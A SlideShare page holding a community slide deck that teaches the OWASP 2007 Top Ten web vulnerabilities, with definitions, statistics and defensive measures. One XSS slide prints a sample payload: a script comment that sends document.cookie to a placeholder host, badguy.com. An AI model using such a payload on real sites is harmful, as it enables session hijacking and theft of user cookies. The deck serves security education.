SlideShare a Scribd company logo
1 of 54
Download to read offline
About us:
 Vaibhav Gupta
 Current: Security Researcher @ Adobe
 Past: Senior Information Security Engg. @ Fortune 500
 Vishal Asthana
 Regional Director – Security Compass (India Ops)
 Web Application Security, Secure SDLC, Agile Security
 Sandeep Singh
 Current: Security Analyst @ Dell
 Past: Independent Security Consultant
 And…we are Delhi chapter leaders for
Null – The Open Security Community (What is this??)
2
null – the open Security community
 Open Security Community (Not for Profit Registered)
 Local chapters in various cities
 Comprised of Security Professionals & Enthusiasts
 Knowledge & Information Sharing Platform
 ** Not a Training Institution
 ** Not a bunch of hackers/anarchists always talking about
breaking systems
 ** Not an underground community
3
Participate
 How can I become a member of null?
 Join Mailing List (http://groups.google.com/group/null-co-in)
 Participate in Discussion on Mailing Lists
 Attend Monthly meets
 How do I participate?
 Attend/Speak at Monthly meets
 Conduct full day workshops(Humla/Bachaav/Puliya)
 Spread the word 
4
Introduction
 Purpose of Session:
- Provide Overview Web Application Security Threats and
Defense
 Using the Open Web Application Security Project (OWASP) “2007
Top Ten List,” we will:
- Define the vulnerabilities
- Illustrate the Web Application vulnerabilities
- Explain how to protect against the vulnerabilities
5
Credits and References
 2 Documents copyrighted by the Open Web Application Security
Project, and freely downloaded from www.owasp.org.
 OWASP 2007 Top Ten is titled "The Ten Most Critical Web
Application Security Vulnerabilities" 2007 update.
 http://www.owasp.org/index.php/Top_10_2007
 The OWASP Guide is titled "A Guide to Building Secure Web
Applications" 2.0.1 Black Hat Edition, July 2005
 http://www.owasp.org/index.php/OWASP_Guide_Project
6
What is Web Application Security?
 Not Network Security
 Securing the “custom code” that drives a web application
 Securing libraries
 Securing backend systems
 Securing web and application servers
 Network Security Mostly Ignores the Contents of HTTP Traffic
 Firewalls, SSL, Intrusion Detection Systems, Operating System
Hardening, Database Hardening
7
http://aspectsecurity.com/topten
What is an OWASP?
 Open Web Application Security Project
 http://www.owasp.org
 Open group focused on understanding and improving
the security of web applications and web services!
 Hundreds of volunteer experts from around the world
 Top Ten Project
 Raise awareness with a simple message
 Lead by Aspect Security
How Bad Is It?
 Bad
9
**Web Application Security Consortium (WASC)
http://www.webappsec.org/projects/statistics/
(Server-side Include)
How Bad Is It?
 Pretty Bad
10
Threat Classification No. of Vulns Vuln. % No. of Sites % of Vuln. Sites
Brute Force 66 0.04% 66 0.21%
Content Spoofing 663 0.45% 218 0.69%
Cross Site Scripting 100,059 67.59% 26,531 84.57%
Directory Indexing 292 0.20% 168 0.54%
HTTP Response Splitting 4,487 3.03% 3,062 9.76%
Information Leakage 20,518 13.86% 4,924 15.70%
Insufficient Authentication 84 0.06% 1 0.00%
Insufficient Authorization 23 0.02% 4 0.01%
Insufficient Session Expiration 46 0.03% 1 0.00%
OS Commanding 143 0.10% 44 0.14%
Path Traversal 426 0.29% 374 1.19%
Predictable Resource Location 651 0.44% 173 0.55%
SQL Injection 19,607 13.25% 8,277 26.38%
SSI Injection 950 0.64% 298 0.95%
XPath Injection 14 0.01% 6 0.02%
148,029 100.00% 44,147
**Web Application Security Consortium (WASC) http://www.webappsec.org/projects/statistics/
- 31,373 Sites Tested
OWASP Top Ten List
A1. Cross-Site Scripting (XSS)
A2. Injections Flaws
A3. Malicious File Execution
A4. Insecure Direct Object Reference
A5. Cross Site Request Forgery (CSRF)
A6. Information Leakage & Improper Error Handling
A7. Broken Authentication & Session Management
A8. Insecure Cryptographic Storage
A9. Insecure Communications
A10. Failure to Restrict URL Access
11
Your Code is Part of Your Security Perimeter
12
Firewall
Hardened OS
Web Server
App Server
Firewall
Databases
LegacySystems
WebServices
Directories
HumanResrcs
Billing
Custom Developed
Application Code
APPLICATION
ATTACK
You can’t use network layer protection (firewall, SSL, IDS, hardening)
to stop or detect application layer attacks
NetworkLayerApplicationLayer
Your security “perimeter” has huge
holes at the application layer
A1. Cross-Site Scripting (XSS) Flaws
OWASP Definition
XSS flaws occur whenever an application takes user supplied
data and sends it to a web browser without first validating or
encoding that content. XSS allows attackers to execute script in
the victim's browser which can hijack user sessions, deface web
sites, possibly introduce worms, etc.
13
A1. Cross-Site Scripting (XSS) Attacks
3 Categories of XSS attacks:
 Stored - the injected code is permanently stored
(in a database, message forum, visitor log, etc.)
 Reflected - attacks that are reflected take some other route to the
victim (through an e-mail message, or bounced off from some other
server)
 DOM injection – Injected code manipulates sites javascript code or
variables, rather than HTML objects.
Example Comment embedded with JavaScript
comment=“Nice site! <SCRIPT> window.open(
http://badguy.com/info.pl?document.cookie
</SCRIPT>
14
A1. Cross-Site Scripting (XSS)
 Occurs when an attacker can manipulate a Web application to send
malicious scripts to a third party.
 This is usually done when there is a location that arbitrary content can
be entered into (such as an e-mail message, or free text field for
example) and then referenced by the target of the attack.
 The attack typically takes the form of an HTML tag (frequently a
hyperlink) that contains malicious scripting (often JavaScript).
 The target of the attack trusts the Web application and thus XSS
attacks exploit that trust to do things that would not normally be
allowed.
 The use of Unicode and other methods of encoding the malicious
portion of the tag are often used so the request looks less suspicious
to the target user or to evade IDS/IPS.
15
XSS - Protection
Protect your application from XSS attacks
 Filter output by converting text/data which might have dangerous
HTML characters to its encoded format:
 '<' and '>' to '&lt;' and '&gt;’
 '(' and ')' to '&#40;' and '&#41;’
 '#' and '&' to '&#35;' and '&#38;‘
 Recommend filtering on input as much as possible. (some data
may need to allow special characters.)
16
A2. Injections Flaws
OWASP Definition:
Injection flaws, particularly SQL injection, are common in web
applications. Injection occurs when user-supplied data is sent to
an interpreter as part of a command or query. The attacker’s
hostile data tricks the interpreter into executing unintended
commands or changing data.
17
A2. Injections Flaws
Some common types of command injection flaws include:
 SQL injection (malicious calls to backend databases via SQL),
using shell commands to run external programs
 Using system calls to in turn make calls to the operating
system.
Any Web application that relies on the use of an interpreter has the
potential to fall victim to this type of flaw
18
A2. Injections Flaws: Protection
 Use language specific libraries to perform the same functions as shell
commands and system calls
 Check for existing reusable libraries to validate input, and safely
perform system functions, or develop your own.
 Perform design and code reviews on the reusable libraries to ensure
security.
Other common methods of protection include:
 Use stored Procedures
 Data validation (to ensure input isn't malicious code),
 Run commands with very minimal privileges
 If the application is compromised, the damage will be minimized.
19
A3. Malicious File Execution
OWASP Definition:
Code vulnerable to remote file inclusion (RFI) allows attackers
to include hostile code and data, resulting in devastating
attacks, such as total server compromise.
Malicious file execution attacks affect PHP, XML and any
framework which accepts filenames or files from users.
20
A3. Malicious File Execution
 Applications which allow the user to provide a
filename, or part of a filename are often vulnerable if
input is not carefully validated.
 Allowing the attacker to manipulate the filename may
cause application to execute a system program or
external URL.
 Applications which allow file uploads have additional
risks
 Place executable code into the application
 Replace a Session file, log file or authentication token
21
A3. Malicious File Execution Protection
 Do not allow user input to be used for any part of a file or
path name.
 Where user input must influence a file name or URL, use a
fully enumerated list to positively validate the value.
 File uploads have to be done VERY carefully.
 Only allow uploads to a path outside of the webroot so it can not
be executed
 Validate the file name provided so that a directory path is not
included.
 Implement or enable sandbox or chroot controls which limit the
applications access to files.
22
A4. Insecure Direct Object Reference
OWASP Definition:
A direct object reference occurs when a developer exposes a
reference to an internal implementation object, such as a file,
directory, database record, or key, as a URL or form parameter.
Attackers can manipulate those references to access other
objects without authorization.
23
A4. Insecure Direct Object Reference
 Applications often expose internal objects, making
them accessible via parameters.
 When those objects are exposed, the attacker may
manipulate unauthorized objects, if proper access
controls are not in place.
 Internal Objects might include
 Files or Directories
 URLs
 Database key, such as acct_no, group_id etc.
 Other database object names such as table name
24
A4. Insecure Direct Object Reference Protection
 Do not expose direct objects via parameters
 Use an indirect mapping which is simple to validate.
 Consider using a mapped numeric range, file=1 or 2 …
 Re-verify authorization at every reference.
 For example:
1. Application provided an initial lists of only the
authorized options.
2. When user’s option is “submitted” as a parameter,
authorization must be checked again.
25
A5. Cross Site Request Forgery (CSRF)
OWASP Definition:
A CSRF attack forces a logged-on victim’s browser to send a
pre-authenticated request to a vulnerable web application,
which then forces the victim’s browser to perform a hostile
action to the benefit of the attacker. CSRF can be as powerful
as the web application that it attacks.
26
A5. Cross Site Request Forgery (CSRF)
 Applications are vulnerable if any of following:
 Does not re-verify authorization of action
 Default login/password will authorize action
 Action will be authorized based only on credentials
which are automatically submitted by the browser such
as session cookie, Kerberos token, basic authentication,
or SSL certificate etc.
27
A5. Cross Site Request Forgery (CSRF) Protection
 Eliminate any Cross Site Scripting vulnerabilities
 Not all CSRF attacks require XSS
 However XSS is a major channel for delivery of CSRF
attacks
 Generate unique random tokens for each form or URL,
which are not automatically transmitted by the
browser.
 Do not allow GET requests for sensitive actions.
 For sensitive actions, re-authenticate or digitally sign
the transaction.
28
A6. Information Leakage & Improper Error Handling
OWASP Definition:
Applications can unintentionally leak information about their
configuration, internal workings, or violate privacy through a
variety of application problems. Attackers use this weakness to
steal sensitive data or conduct more serious attacks.
29
Improper Error Handling: Protection
 Prevent display of detailed internal error messages including stack
traces, messages with database or table names, protocols, and other
error codes. (This can provide attackers clues as to potential flaws.)
 Good error handling systems should always enforce the security
scheme in place while still being able to handle any feasible input.
 Provide short error messages to the user while logging detailed error
information to an internal log file.
 Diagnostic information is available to site maintainers
 Vague messages indicating an internal failure provided to the
users
 Provide just enough information to allow what is reported by the user
to be able to linked the internal error logs. For example: System Time-
stamp, client IP address, and URL
30
Information Leakage - Example
 Sensitive information can be leaked very subtlety
 Very Common Example - Account Harvesting
 App. responds differently to a valid user name with an invalid password,
then it would to a invalid user name
 Web application discloses which logins are valid vs. which are invalid,
and allows accounts to be guessed and harvested.
 Provides the attacker with an important initial piece of information, which
may then be followed with password guessing.
 Difference in the Web App response may be:
 Intentional (Easier to for users to tell then the account name is wrong)
 Different code included in URL, or in a hidden field
 Any minor difference in the HTML is sufficient
 Differences in timing are also common and may be used!
31
Information Leakage: Protections
 Ensure sensitive responses with multiple outcomes
return identical results
 Save the the different responses and diff the html, the
http headers & URL.
 Ensure error messages are returned in roughly the
same time or consider imposing a random wait time
for all transactions to hide this detail from the
attacker.
32
A7. Broken Authentication and Session Management
OWASP Definition:
Account credentials and session tokens are often not properly
protected. Attackers compromise passwords, keys, or
authentication tokens to assume other users’ identities.
33
Session Management
 HTTP/S protocol does not provide tracking of a users session.
 Session tracking answers the question:
 After a user authenticates how does the server associate
subsequent requests to the authenticated user?
 Typically, web application vendors provide a built-in session
tracking, which is good if used properly.
 Often developers will make the mistake of inventing their own
session tracking.
34
Session Management (Session IDs)
A Session ID
 Unique to the User
 Used for only one authenticated session
 Generated by the server
 Sent to the client as
 Hidden variable,
 HTTP cookie,
 URL query string (not a good practice)
 The user is expected to send back the same ID in the next
request.
35
Session Management (Session Hijacking)
 Session ID is disclosed or is guessed.
 An attacker using the same session ID has the same privileges as
the real user.
 Especially useful to an attacker if the session is privileged.
 Allows initial access to the web application to be combined with
other attacks.
36
Session Management: Protection
 Use long complex random session ID that cannot be guessed.
 Protect the transmission and storage of the Session ID to prevent
disclosure and hijacking.
 A URL query string should not be used for Session ID or any
User/Session information
 URL is stored in browser cache
 Logged via Web proxies and stored in the proxy cache
37
Session Management: Protection
 Entire session should be transmitted via HTTPS to prevent
disclosure of the session ID. (not just the authentication)
 Avoid or protect any session information transmitted to/from the
client.
 Session ID should expire and/or time-out on the Server when
idle or on logout.
 Client side cookie expirations useful, but should not be trusted.
 Consider regenerating a new session upon successful
authentication or privilege level change.
38
Broken Account Management
Even valid authentication schemes can be undermined by flawed
account management functions including:
 Account update
 Forgotten password recovery or reset
 Change password, and other similar functions
39
Broken Account and Session Management: Protection
 Password Change Controls - require users to provide both old
and new passwords
 Forgotten Password Controls - if forgotten passwords are
emailed to users, they should be required to re-authenticate
whenever they attempt to change their email address.
 Password Strength - require at least 7 characters, with letters,
numbers, and special characters both upper case and lower
case.
 Password Expiration - Users must change passwords every 90
days, and administrators every 30 days.
40
Broken Account and Session Management: Protection
 Password Storage - never store passwords in plain text. Passwords
should always be stored in either hashed (preferred) or encrypted form.
 Protecting Credentials in Transit - to prevent "man-in-the-middle"
attacks the entire authenticated session / transaction should be encrypted
SSLv3 or TLSv1
 Man-in-the-middle attacks - are still possible with SSL if users disable or
ignore warnings about invalid SSL certificates.
 Replay attacks - Transformations such as hashing on the client side
provide little protection as the hashed version can simply be intercepted
and retransmitted so that the actual plain text password is not needed.
41
A8. Insecure Cryptographic Storage
OWASP Definition:
Web applications rarely use cryptographic functions properly to
protect data and credentials. Attackers use weakly protected
data to conduct identity theft and other crimes, such as credit
card fraud.
42
A8. Insecure Cryptographic Storage
 The majority of Web applications in use today need to store
sensitive information (passwords, credit card numbers, proprietary
information, etc.) in a secure fashion.
 The use of encryption has become relatively easy for developers
to incorporate.
 Proper utilization of cryptography, however, can remain elusive by
developers overestimating the protection provided by encryption,
and underestimating the difficulties of proper implementation and
protecting the keys.
43
Insecure Cryptographic Storage: Common Mistakes
 Improper/insecure storage of passwords, certifications, and keys
 Poor choice of algorithm
 Poor source of randomness for initialization vectors
 Attempting to develop a new encryption scheme "in house”
(Always a BAD idea)
 Failure to provide functionality to change encryption keys
44
Insecure Cryptographic Storage: Protection
 Avoiding storing sensitive information when possible
 Use only approved standard algorithms
 Use platform specific approved storage mechanisms
 Ask, read and learn about coding Best Practices for your
platform
 Careful review of all system designs
 Source code reviews
45
A9. Insecure Communications
OWASP Definition:
Applications frequently fail to encrypt network traffic when it is
necessary to protect sensitive communications.
46
Insecure Communications
 Failure to encrypt network traffic leaves the information available
to be sniffed from any compromised system/device on the
network.
 Switched networks do not provide adequate protection.
47
Insecure Communications: Protection
 Use SSL/TLS for ALL connections that are authenticated
or transmitting sensitive information
 Use SSL/TLS for mid-tier and internal network
communications between Web Server, Application and
database.
 Configure Desktop Clients and Servers to ensure only
SSLv3 and TLSv1 are used with strong ciphers.
 Use only valid trusted SSL/TLS certificates and train
users to expect valid certificates to prevent Man-in-the-
Middle attacks.
48
A10. Failure to Restrict URL Access
OWASP Definition:
Frequently, an application only protects sensitive functionality
by preventing the display of links or URLs to unauthorized
users. Attackers can use this weakness to access and perform
unauthorized operations by accessing those URLs directly.
49
A10. Failure to Restrict URL Access
 When the application fails to restrict access to administrative
URLs, the attacker can access normally unauthorized areas by
type in the URL’s into the browser.
 Surprisingly common, for example:
 add_account_form.php - checks for admin access before
displaying the form.
 Form then posts to add_acct.php which does the work, but doesn’t
check for admin privileges!
 Consistent URL access control has to be carefully designed.
50
A10. Failure to Restrict URL Access : Protection
Start Early!
 Create an application specific security policy during the
requirements phase.
 Document user roles as well as what functions and content each
role is authorized to access.
 Specifying access requirements up front allows simplification of
the design
 If your access control is not simple it won't be secure.
51
A10. Failure to Restrict URL Access: Protection
Test Thoroughly!
 Conduct extensive regression testing to ensure the access control
scheme cannot be bypassed
 Test all invalid access attempts as well as valid access.
 Don't follow the normal application flow.
 Verify that all aspects of user management have been taken under
consideration including scalability and maintainability.
52
Summary
 Application Security starts with the Architecture and Design
 Security can’t be added on later without re-designing and
rewriting
 Custom code often introduces vulnerabilities
 Application vulnerabilities are NOT prevented by traditional
security controls.
 Don’t invent your own security controls
 Design, Design, Design, code, test, test, test
53
Web Application Security 101

More Related Content

What's hot

VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Application Security
Application SecurityApplication Security
Application Securityflorinc
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on itWSO2
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewMichael Furman
 
Secure code practices
Secure code practicesSecure code practices
Secure code practicesHina Rawal
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web ServersSam Bowne
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
Web application security
Web application securityWeb application security
Web application securityAkhil Raj
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Cia security model
Cia security modelCia security model
Cia security modelImran Ahmed
 
Program security
Program securityProgram security
Program securityG Prachi
 
Security testing
Security testingSecurity testing
Security testingbaskar p
 

What's hot (20)

VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Application Security
Application SecurityApplication Security
Application Security
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on it
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web Servers
 
Xss attack
Xss attackXss attack
Xss attack
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Security testing
Security testingSecurity testing
Security testing
 
Web application security
Web application securityWeb application security
Web application security
 
Web security
Web securityWeb security
Web security
 
Web Security
Web SecurityWeb Security
Web Security
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
Cia security model
Cia security modelCia security model
Cia security model
 
Computer Worms
Computer WormsComputer Worms
Computer Worms
 
Program security
Program securityProgram security
Program security
 
Cyber kill chain
Cyber kill chainCyber kill chain
Cyber kill chain
 
Security testing
Security testingSecurity testing
Security testing
 

Similar to Web Application Security 101

Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10  -2007Application Security Vulnerabilities: OWASP Top 10  -2007
Application Security Vulnerabilities: OWASP Top 10 -2007Vaibhav Gupta
 
Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Sampath Bhargav Pinnam
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud appsCenzic
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awarenessJanagi Kannan
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
 
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Braindev Kyiv
 
OWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersOWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersBenjamin Floyd
 
Drupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupDrupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupChris Hales
 
Break it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareBreak it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareLeigh Honeywell
 
Owasp top 10 Vulnerabilities by cyberops infosec
Owasp top 10 Vulnerabilities by cyberops infosecOwasp top 10 Vulnerabilities by cyberops infosec
Owasp top 10 Vulnerabilities by cyberops infosecCyberops Infosec LLP
 
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...Neil Matatall
 

Similar to Web Application Security 101 (20)

Application Security Vulnerabilities: OWASP Top 10 -2007
Application Security Vulnerabilities: OWASP Top 10  -2007Application Security Vulnerabilities: OWASP Top 10  -2007
Application Security Vulnerabilities: OWASP Top 10 -2007
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
OWASP -Top 5 Jagjit
OWASP -Top 5 JagjitOWASP -Top 5 Jagjit
OWASP -Top 5 Jagjit
 
Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud apps
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awareness
 
OWASP Top10 2010
OWASP Top10 2010OWASP Top10 2010
OWASP Top10 2010
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
 
Introduction to security testing raj
Introduction to security testing rajIntroduction to security testing raj
Introduction to security testing raj
 
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities
 
Web app security essentials
Web app security essentialsWeb app security essentials
Web app security essentials
 
T04505103106
T04505103106T04505103106
T04505103106
 
OWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web DevelopersOWASP Top 10 List Overview for Web Developers
OWASP Top 10 List Overview for Web Developers
 
Drupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupDrupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January Meetup
 
Owasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentationOwasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentation
 
Break it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareBreak it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure software
 
Owasp top 10 Vulnerabilities by cyberops infosec
Owasp top 10 Vulnerabilities by cyberops infosecOwasp top 10 Vulnerabilities by cyberops infosec
Owasp top 10 Vulnerabilities by cyberops infosec
 
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
 
OWASP
OWASPOWASP
OWASP
 

More from Cybersecurity Education and Research Centre

Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Cybersecurity Education and Research Centre
 
Data-Driven Assessment of Cyber Risk: Challenges in Assessing and Migrating C...
Data-Driven Assessment of Cyber Risk: Challenges in Assessing and Migrating C...Data-Driven Assessment of Cyber Risk: Challenges in Assessing and Migrating C...
Data-Driven Assessment of Cyber Risk: Challenges in Assessing and Migrating C...Cybersecurity Education and Research Centre
 
National Critical Information Infrastructure Protection Centre (NCIIPC): Role...
National Critical Information Infrastructure Protection Centre (NCIIPC): Role...National Critical Information Infrastructure Protection Centre (NCIIPC): Role...
National Critical Information Infrastructure Protection Centre (NCIIPC): Role...Cybersecurity Education and Research Centre
 
Twitter and Polls: What Do 140 Characters Say About India General Elections 2014
Twitter and Polls: What Do 140 Characters Say About India General Elections 2014Twitter and Polls: What Do 140 Characters Say About India General Elections 2014
Twitter and Polls: What Do 140 Characters Say About India General Elections 2014Cybersecurity Education and Research Centre
 

More from Cybersecurity Education and Research Centre (17)

Automated Methods for Identity Resolution across Online Social Networks
Automated Methods for Identity Resolution across Online Social NetworksAutomated Methods for Identity Resolution across Online Social Networks
Automated Methods for Identity Resolution across Online Social Networks
 
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
Novel Instruction Set Architecture Based Side Channels in popular SSL/TLS Imp...
 
Video Inpainting detection using inconsistencies in optical Flow
Video Inpainting detection using inconsistencies in optical FlowVideo Inpainting detection using inconsistencies in optical Flow
Video Inpainting detection using inconsistencies in optical Flow
 
TASVEER : Tomography of India’s Internet Infrastructure
TASVEER : Tomography of India’s Internet InfrastructureTASVEER : Tomography of India’s Internet Infrastructure
TASVEER : Tomography of India’s Internet Infrastructure
 
Data-Driven Assessment of Cyber Risk: Challenges in Assessing and Migrating C...
Data-Driven Assessment of Cyber Risk: Challenges in Assessing and Migrating C...Data-Driven Assessment of Cyber Risk: Challenges in Assessing and Migrating C...
Data-Driven Assessment of Cyber Risk: Challenges in Assessing and Migrating C...
 
A Strategy for Addressing Cyber Security Challenges
A Strategy for Addressing Cyber Security Challenges A Strategy for Addressing Cyber Security Challenges
A Strategy for Addressing Cyber Security Challenges
 
Identification and Analysis of Malicious Content on Facebook: A Survey
Identification and Analysis of Malicious Content on Facebook: A SurveyIdentification and Analysis of Malicious Content on Facebook: A Survey
Identification and Analysis of Malicious Content on Facebook: A Survey
 
Clotho : Saving Programs from Malformed Strings and Incorrect
Clotho : Saving Programs from Malformed Strings and IncorrectClotho : Saving Programs from Malformed Strings and Incorrect
Clotho : Saving Programs from Malformed Strings and Incorrect
 
National Critical Information Infrastructure Protection Centre (NCIIPC): Role...
National Critical Information Infrastructure Protection Centre (NCIIPC): Role...National Critical Information Infrastructure Protection Centre (NCIIPC): Role...
National Critical Information Infrastructure Protection Centre (NCIIPC): Role...
 
Clotho: Saving Programs from Malformed Strings and Incorrect String-handling
Clotho: Saving Programs from Malformed Strings and Incorrect String-handling�Clotho: Saving Programs from Malformed Strings and Incorrect String-handling�
Clotho: Saving Programs from Malformed Strings and Incorrect String-handling
 
Analyzing Social and Stylometric Features to Identify Spear phishing Emails
Analyzing Social and Stylometric Features to Identify Spear phishing EmailsAnalyzing Social and Stylometric Features to Identify Spear phishing Emails
Analyzing Social and Stylometric Features to Identify Spear phishing Emails
 
Emerging Phishing Trends and Effectiveness of the Anti-Phishing Landing Page
Emerging Phishing Trends and Effectiveness of the Anti-Phishing Landing PageEmerging Phishing Trends and Effectiveness of the Anti-Phishing Landing Page
Emerging Phishing Trends and Effectiveness of the Anti-Phishing Landing Page
 
Securing the Digital Enterprise
Securing the Digital EnterpriseSecuring the Digital Enterprise
Securing the Digital Enterprise
 
Broker Bots: Analyzing automated activity during High Impact Events on Twitter
Broker Bots: Analyzing automated activity during High Impact Events on TwitterBroker Bots: Analyzing automated activity during High Impact Events on Twitter
Broker Bots: Analyzing automated activity during High Impact Events on Twitter
 
Twitter and Polls: What Do 140 Characters Say About India General Elections 2014
Twitter and Polls: What Do 140 Characters Say About India General Elections 2014Twitter and Polls: What Do 140 Characters Say About India General Elections 2014
Twitter and Polls: What Do 140 Characters Say About India General Elections 2014
 
Exploration of gaps in Bitly's spam detection and relevant countermeasures
Exploration of gaps in Bitly's spam detection and relevant countermeasuresExploration of gaps in Bitly's spam detection and relevant countermeasures
Exploration of gaps in Bitly's spam detection and relevant countermeasures
 
The future of interaction & its security challenges
The future of interaction & its security challengesThe future of interaction & its security challenges
The future of interaction & its security challenges
 

Recently uploaded

Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????blackmambaettijean
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
